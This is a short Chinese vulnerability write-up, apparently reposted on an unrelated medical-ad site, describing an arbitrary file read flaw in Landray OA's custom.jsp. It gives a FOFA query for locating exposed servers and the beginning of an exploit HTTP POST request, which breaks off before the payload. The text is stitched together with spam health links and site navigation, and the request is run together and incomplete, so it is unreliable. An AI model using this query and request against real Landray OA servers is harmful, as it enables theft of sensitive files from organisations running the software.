当前位置:包虫病 >> 疾病病因 >> 蓝凌OAcustomjsp任意文件

蓝凌OAcustomjsp任意文件

看白癜风去哪里 https://m-mip.39.net/baidianfeng/mipso_7337065.html

一:漏洞描述??

深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息。

二:漏洞影响??

蓝凌OA

三:漏洞复现??

FOFA:app="Landray-OA系统"

出现漏洞的文件为custom.jsp,请求包为

POST/sys/ui/extend/varkind/custom.jspHTTP/1.1Host:User-Agent:Mozilla/5.0(Macintosh;IntelMacOSX10_14_3)AppleWebKit/.1.15(KHTML,likeGecko)Version/12.0.3Safari/.1.15Content-Length:42Content-Type:application/x-

转载请注明:http://www.sonphie.com/jbby/14180.html

  • 上一篇文章:
  • 下一篇文章: 没有了
    • 最新文章
    热点文章
    • 没有热点文章
    推荐文章
    • 没有推荐文章
    网站简介| 发布优势| 服务条款| 隐私保护| 广告合作| 网站地图| 版权申明

    当前时间: